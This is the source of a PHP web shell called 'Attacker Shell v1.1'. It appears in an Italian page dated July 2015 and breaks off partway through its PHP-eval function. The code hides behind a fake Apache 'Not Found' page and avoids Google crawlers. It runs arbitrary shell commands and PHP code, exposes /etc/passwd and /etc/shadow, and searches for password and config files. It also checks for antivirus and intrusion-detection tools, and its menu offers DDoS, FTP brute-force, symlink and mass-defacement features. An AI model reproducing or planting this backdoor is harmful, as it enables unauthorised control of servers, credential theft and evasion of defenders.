Uscite del 4 luglio 2015



<?php
               
$auth_pass = "9df3ca2dae1d9aee80928d4cf404e8e4";
$default_action = 'Expl';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    arHeader('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('TITLE', 'Attacker Shell v1.1');

if(get_magic_quotes_gpc()) {
function ARstripslashes($array) {
return is_array($array) ? array_map('ARstripslashes', $array) : stripslashes($array);
}
$_POST = ARstripslashes($_POST);
    $_COOKIE = ARstripslashes($_COOKIE);
}

function arLogin() {
  echo "<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
";
echo '<address> Apache Server at '. $_SERVER['HTTP_HOST']. ' Port 80</address>';
  echo"  <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
";
exit;
}


function ARsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        ARsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        arLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
$aliases = array("List Directory" => "dir","Find index.php in current dir" => "dir /s /w /b index.php","Find *config*.php in current dir" => "dir /s /w /b *config*.php","Show active connections" => "netstat -an","Show running services" => "net start","User accounts" => "net user","Show computers" => "net view","ARP Table" => "arp -a","IP Configuration" => "ipconfig /all");
else
$aliases = array("List dir" => "ls -lha","list file attributes on a Linux second extended file system" => "lsattr -va","show opened ports" => "netstat -an | grep -i listen","process status" => "ps aux","Find" => "","find all suid files" => "find / -type f -perm -04000 -ls","find suid files in current dir" => "find . -type f -perm -04000 -ls","find all sgid files" => "find / -type f -perm -02000 -ls","find sgid files in current dir" => "find . -type f -perm -02000 -ls","find config.inc.php files" => "find / -type f -name config.inc.php","find config* files" => "find / -type f -name \"config*\"","find config* files in current dir" => "find . -type f -name \"config*\"","find all writable folders and files" => "find / -perm -2 -ls","find all writable folders and files in current dir" => "find . -perm -2 -ls","find all service.pwd files" => "find / -type f -name service.pwd","find service.pwd files in current dir" => "find . -type f -name service.pwd","find all .htpasswd files" => "find / -type f -name .htpasswd","find .htpasswd files in current dir" => "find . -type f -name .htpasswd","find all .bash_history files" => "find / -type f -name .bash_history","find .bash_history files in current dir" => "find . -type f -name .bash_history","find all .fetchmailrc files" => "find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc","Locate" => "","locate httpd.conf files" => "locate httpd.conf","locate vhosts.conf files" => "locate vhosts.conf","locate proftpd.conf files" => "locate proftpd.conf","locate psybnc.conf files" => "locate psybnc.conf","locate my.conf files" => "locate my.conf","locate admin.php files" =>"locate admin.php","locate cfg.php files" => "locate cfg.php","locate conf.php files" => "locate conf.php","locate config.dat files" => "locate config.dat","locate config.php files" => "locate config.php","locate config.inc files" => "locate config.inc","locate config.inc.php" => "locate config.inc.php","locate config.default.php files" => "locate config.default.php","locate config* files " => "locate config","locate .conf files"=>"locate '.conf'","locate .pwd files" => "locate '.pwd'","locate .sql files" => "locate '.sql'","locate .htpasswd files" => "locate '.htpasswd'","locate .bash_history files" => "locate '.bash_history'","locate .mysql_history files" => "locate '.mysql_history'","locate .fetchmailrc files" => "locate '.fetchmailrc'","locate backup files" => "locate backup","locate dump files" => "locate dump","locate priv files" => "locate priv");

function arHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
global $color;
if(!$color) $color = 'white';

echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . TITLE ."</title>
<style type='text/css'>
 input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:repeat-x center bottom #141414;
border:1px solid #393939;
color:#fff;
border-top-color:#393939;
padding:4px 4px;
margin:2px 3px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:6px;
-webkit-border-radius:9px;
-khtml-border-radius:4px;
border-radius:9px;
height:23px;
}

input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
background-position:center top;
text-decoration:none;
}
input[type=text], input[type=password]{
outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.20s ease-in-out;
    -moz-transition: all 0.20s ease-in-out;
    border:1px solid rgba(0,0,0, 0.2);
    background:#111111;
    border:0;
    padding:2px;
    border-bottom:1px solid #393939;
    font-size:11px;
    color:#ffffff;
    -moz-border-radius: 6px;
    border-radius: 9px;
    border:1px solid #4C83AF;
    margin:4px 0 8px 0;
}
input[type=text]{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
input[type=submit]:hover ,input[type=text]:hover{
    background:#222222;
    border-left:1px solid #4C83AF;
    border-right:1px solid #4C83AF;
    border-bottom:1px solid #4C83AF;
    border-top:1px solid #4C83AF;
}
input:focus, textarea:focus {
    outline: 0;
    border-color: rgba(82, 168, 236, 0.8);
    -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    background:#191919;';
    overflow: auto;
}
*{
    text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
    font-size:11px;
    font-family:Tahoma,Verdana,Arial;
}
body{
    background:#010101;
    color:#fff;
}
body,td,th{
    font: 9pt Lucida,Verdana;
    margin:0;vertical-align:top;
    color:#fff;
}
table.info{
    color:#fff;
    background-color:#010101;
}
span,h1,a{
    color: $color !important;
}
span{
    font-weight: bolder;
}
div.content{
    height: auto;
    width: auto;
    border: 2px solid #333;
    color: #999;
    font-size: 12px;
    font-family: Verdana, Geneva, sans-serif;
    background-color: #000;
}
a {
    text-decoration:none;
    color: rgba(35,96,156,1.5) !important;
}
a:hover{
    border-bottom:1px solid #4C83AF;
}
.ml1{
    border:1px solid #000;
    padding:5px;margin:0;
    overflow: auto;
}
.bigarea{
    width:100%;
    height:300px;
}
input,textarea,select{
    margin:0;
    color:#fff;
    background-color:#141414;
}
select{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
textarea{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
#menu{
    font-family:orbitron;
    background: #111111;
    margin:5px 2px 4px 2px;
}
#menu ul {
    margin:0;
    padding:0;
    float:left;
    -moz-border-radius: 6px;
    border-radius: 9px;
    border:1px solid #555555;
}
#menu li {
    position:relative;
    display:block;
    float:left;
}
#menu a{
    display:block;
    float:left;
    font-family:orbitron;
    padding:4px 6px;
    margin:0;
    text-decoration:none;
    letter-spacing:1px;
    color:white;
}
#menu a:hover{
    background:rgba(35,96,156,0.2);
    font-family:orbitron;
    border-bottom:0px;
}
#menu li:hover>ul a:hover{
    width:127;
    background:rgba(35,96,156,0.2);
}
#menu li:hover>ul{
    left:0px;
    border-left:1px solid white;
}
#menu ul ul{
    position:absolute;
    top:18px;left:-990em;
    width:140px;
    padding:5px 0 5px 0;
    background:black;
    margin-top:2px;
}
form{
    margin:0px;
}
#toolsTbl{
    text-align:center;
}
h1{
    border-left:0px solid $color;
    padding: 0px;
    font: 13pt Verdana;
    background-color:#auto;
}
.main th{
    text-align:left;
    background:#191919;
    border-bottom:0px solid #333333;
    font-weight:normal;
}
.main tr:hover{
    background:rgba(35,96,156,0.2);
}

</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}

</script>
<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
    $bing = 'http://www.bing.com/search?q=ip:'. @$_SERVER["SERVER_ADDR"] ;
if(strpos('Linux', $kernel) !== false)
$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
else
$explink .= urlencode($kernel . ' ' . substr($release,0,3));
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"Expl\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}

$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

$drives = "";
if($GLOBALS['os'] == 'win') {
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'Expl\',\''.$drive.':/\')"><span>|</span> '.$drive.'<span> |</span></a> ';
}
    $on   = "<font color=#0F0> ON </font>";
    $of   = "<font color=red> OFF </font>";
    $none = "<font color=#0F0> NONE </font>";
    if(function_exists('curl_version'))
      $curl = $on;
    else
      $curl = $of;
    if(function_exists('mysql_get_client_info'))
       $mysql = $on;
    else
       $mysql = $of;
    if(function_exists('mssql_connect'))
      $mssql = $on;
    else
      $mssql = $of;
    if(function_exists('pg_connect'))
      $pg = $on;
    else
      $pg = $of;
    if(function_exists('oci_connect'))
      $or = $on;
    else
      $or = $of;
    if(@ini_get('open_basedir'))
      $open_b = @ini_get('open_basedir');
    else
      $open_b = $none;
    if(@ini_get('safe_mode_exec_dir'))
      $safe_exe = @ini_get('safe_mode_exec_dir');
    else
      $safe_exe = $none;
    if(@ini_get('safe_mode_include_dir'))
      $safe_include = @ini_get('safe_mode_include_dir');
    else
      $safe_include = $none;

    echo '<table class=info cellpadding=3 cellspacing=0 width=100%>'
       . '<td><nobr>'. '<span>Uname -a: </span>' . substr(@php_uname(), 0, 120)
       . '&nbsp;<a href="' . $explink . '" target=_blank>|exploit-db.com|</a></nobr><br>
          <span>User: </span>' . $uid . ' ( ' . $user . ' ) <br>
          <span>Group: </span> ' . $gid . ' ( ' . $group . ' )<br>
          <span>Server: </span>'.@getenv('SERVER_SOFTWARE').'<br>
          <span><font color="Red">Server IP: </font></span>' . @$_SERVER["SERVER_ADDR"] . '&nbsp;|&nbsp;<span><font color="Red">Your IP: </font></span>' . $_SERVER['REMOTE_ADDR'] . '<br>
          <span>Safe Mode: </span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON (Secure)</font>':'<font color=green><b>OFF (Not Secure)</b></font>')
       . '<br><span>PHP Version: </span>' . @phpversion() . '&nbsp;<a href=# onclick="g(\'Eval\',null,\'\',\'info\')">|phpinfo|</a><br>
          <span>Date & Time: </span> ' . date('Y-m-d H:i:s')
       . '<br><Span>HDD: </Span>' . arViewSize($totalSpace)
       . '<br><span>Free: </span> ' . arViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>
          <span>cURL:'. $curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle:'.$or.' </span><br>
          <span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</span><br>
          <span>Detected drives: </span>' . $drives . ' ~~>
          <span>PWD: </span>' . $cwd_links . ' '. arPermsColor($GLOBALS['cwd']) . '&nbsp;<a href=# onclick="g(\'Expl\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color="Red">|HMOE|</font></a></td>'
       . '<td width=1 align=right><nobr><h2 style="font-size:40px; color:rgba(35,96,156,0.3) ">Attacker Shell</h2></nobr></td></tr></table>'
       . '<div id="menu"><ul class="menu">

          <li><a href="#" onclick="g(\'Expl\',null,\'\',\'\',\'\')">EXPLOITER</a></li>
          <li><a href="#" onclick="g(\'Exec\',null,\'\',\'\',\'\')">SHELL</a></li>
          <li><a href="#" onclick="g(\'Eval\',null,\'\',\'\',\'\')">EVAL</a></li>
          <li><a href="#" onclick="g(\'SafeMode\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
          <li><a>SYMLINK</a><ul>
          <li><a href=# onclick="g(\'symlink\',null,\'website\',null)">Domains</a></li>
          <li><a href=# onclick="g(\'symlink\',null,null,\'whole\')">Whole Server Symlink</a></li>
          <li><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">Config PHP symlink</a></li></ul></li>
          <li><a href="#" onclick="g(\'Mass\',null,\'\',\'\',\'\')">MASS</a></li>
          <li><a href="#" onclick="g(\'DDos\',null,\'\',\'\',\'\')">DDOS</a></li>
          <li><a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">SQL</a></li>
          <li><a href="#" onclick="g(\'FTPB\',null,\'\',\'\',\'\')">FTP BRUTE</a></li>
          <li><a href="#" onclick="g(\'String\',null,\'\',\'\',\'\')">HASH</a></li>
          <li><a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">NETWORK</a></li>
          <li><a href="#" onclick="g(\'Sec\',null,\'\',\'\',\'\')">SEC INFO</a></li>
          <li><a href="#" onclick="g(\'Zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
          <li><a href="' . $bing . '"target=_blank>BING</a></li>
          <li><a href="#" onclick="g(\'About\',null,\'\',\'\',\'\')">ABOUT</a></li>
          <li><a href="#" onclick="g(\'Logout\',null,\'\',\'\',\'\')">LOGOUT</a></li>
          <li><a href="#" onclick="g(\'Remove\',null,\'\',\'\',\'\')">KIll CODE</a></li>
          </ul></div>';

  echo "<table class=info cellpadding=3 cellspacing=0 align=left width=100%'>
          <td><form onsubmit=\"g('Exec',null,this.c.value);return false;\"><span>Execute:</span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class='toolsInp' type=text name=c value='' style='width:55%;'><input type=submit value='Execute' style='width:12%;'></form>
          <form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span>&nbsp;&nbsp;<input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."' style='width:55%;'><input type=submit value='Change' style='width:12%;'></form>
          </td><td>
          <form onsubmit=\"g('Expl',null,'mkdir',this.d.value);return false;\"><span>Make dir: </span>$is_writable<input class='toolsInp' type=text name=d style='width:55%;'><input type=submit value='Make' style='width:12%;'></form>
 <form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<input class='toolsInp' type=text name=f style='width:55%;'><input type=submit value='Make' style='width:12%;'></form>
          </td>
          </table>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

function arEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}

function arViewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}

function arPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}

function arPermsColor($f) {
if (!@is_readable($f))
return '<font color=#FF0000>' . arPerms(@fileperms($f)) . '</font>';
elseif (!@is_writable($f))
return '<font color=white>' . arPerms(@fileperms($f)) . '</font>';
else
return '<font color=#25ff00>' . arPerms(@fileperms($f)) . '</font>';
}

function arScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function arWhich($p) {
$path = arEx('which ' . $p);
if(!empty($path))
return $path;
return false;
}

function actionSec() {
arHeader();
echo '<h1>Server security information</h1><div class=content>';
function arSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>' . $n . ': </span>';
if(strpos($v, "\n") === false)
echo $v . '<br>';
else
echo '<pre class=ml1>' . $v . '</pre>';
}
}

arSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        arSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
arSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
arSecParam('Open base dir', @ini_get('open_basedir'));
arSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
arSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
arSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
arSecParam('Supported databases', implode(', ', $temp));
echo '<br>';

if($GLOBALS['os'] == 'nix') {
            arSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            arSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            arSecParam('OS version', @file_get_contents('/proc/version'));
            arSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                arSecParam('HDD space', arEx('df -h'));
                arSecParam('Hosts', @file_get_contents('/etc/hosts'));
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    arSecParam('Users', $temp);
                }
            }
} else {
arSecParam('OS Version',arEx('ver'));
arSecParam('Account Settings',arEx('net accounts'));
arSecParam('User Accounts',arEx('net user'));
}
echo '</div>';
arFooter();
}

function actionEval() {
   if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
                echo '<div class=content>';
                ob_start();
                $INI=ini_get_all();
print '<table border=0><tr>'
        .'<td class="listing"><font class="highlight_txt">Param</td>'
        .'<td class="listing"><font class="highlight_txt">Global value</td>'
        .'<td class="listing"><font class="highlight_txt">Local Value</td>'
        .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values)
        print "\n".'<tr>'
                .'<td class="listing"><b>'.$param.'</td>'
                .'<td class="listing">'.$values['global_value'].' </td>'
                .'<td class="listing">'.$values['local_value'].' </td>'
                .'<td class="listing">'.$values['access'].' </td></tr>';
                $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
                $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
                echo str_replace('<h1','<h2', $tmp) .'</div><br>';
        }

    if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
                echo '<div class=content><style>.p {color:#000;}</style>';
                ob_start();
                phpinfo();
                $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
                $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
                echo str_replace('<h1','<h2', $tmp) .'</div><br>';
        }
    arHeader();
    if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
                echo '<div class=content>';
                ob_start();
             $EXT=get_loaded_extensions ();
     print '<table border=0><tr><td class="listing">'
        .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
        .'</td></tr></table>'
        .count($EXT).' extensions loaded';


        echo '</div><br>';
        }


        if(empty($_POST['ajax']) && !empty($_POST['p1']))
                $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
    echo '<h1>Eval PHP-code</h1><div class=content><form name=pf method=post onsubmit="g(\'Eval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea> <input type=submit value=Eval style="width:6%;"> ';
        echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
        if(!empty($_POST['p1'])) {
 
[02-07-15] [Redazione]